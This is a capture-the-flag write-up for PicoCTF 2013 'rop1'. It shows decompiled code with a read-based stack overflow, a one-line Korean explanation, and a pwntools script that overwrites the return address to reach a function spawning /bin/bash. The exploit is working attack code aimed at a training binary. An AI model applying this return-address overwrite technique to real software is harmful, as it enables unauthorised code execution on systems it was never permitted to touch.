
[PicoCTF 2013] rop1

cg10036 2019. 10. 8. 06:14
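int __cdecl main(int argc, const char **argv, const char **envp)
{
  /* IDA decompiler output for the rop1 challenge binary. The comma between
   * the fd and the string was lost when the page was extracted; restored.
   * Flow: setup helper, the function holding the bug, then a fixed greeting. */
  be_nice_to_people();    /* defined elsewhere in the binary; body not shown on this page */
  vulnerable_function();  /* read(0, &buf, 0x100) into a stack buffer -- see below */
  /* 0xD == 13 == length of "Hello, World\n"; write()'s byte count becomes the
   * process exit status (ssize_t narrowed to int). */
  return write(1, "Hello, World\n", 0xDu);
}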


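ssize_t vulnerable_function()
{
  /* IDA shows only the first byte of the local; the frame annotation
   * ([ebp-88h]) suggests it is really a stack array reaching up to the saved
   * ebp, i.e. about 0x88 bytes -- presumably, confirm in the disassembly. */
  char buf; // [esp+10h] [ebp-88h]

  /* Extraction dropped the comma after the fd; restored.
   * The bug: read() may store up to 0x100 bytes, but the buffer is only 0x88
   * bytes below the saved ebp, so input longer than that overwrites saved ebp
   * and the return address. A corrected binary would bound the count by the
   * buffer size (read(0, buf, sizeof buf)) and check the return value. */
  return read(0, &buf, 0x100u);
}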


int not_called()
{
  /* As the name suggests, nothing in main() reaches this function; it exists
   * in the binary as the destination the write-up redirects control to.
   * system() spawns a shell and its status is returned unchanged. */
  const char *cmd = "/bin/bash";
  return system(cmd);
}


vulnerable_function에서 buf 오버플로우가 난다. ret을 not_called로 덮어씌우면 된다.


ex.py


from pwn import *
 
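# Extraction dropped the names bound on these two lines; "e" and "p" are the
# names the rest of the script uses.
e = ELF("./rop1")
p = process("./rop1")

# Padding length follows from the decompiled frame: buf is at ebp-0x88 and the
# saved ebp is the next 4 bytes, so 0x88 + 4 bytes precede the return address,
# which is then set to the address of not_called.
# Built as bytes so the script also runs under Python 3 pwntools, where p32()
# returns bytes and cannot be concatenated to a str.
payload = b""
payload += b"A" * (0x88 + 0x4)
payload += p32(e.symbols["not_called"])

p.send(payload)
p.interactive()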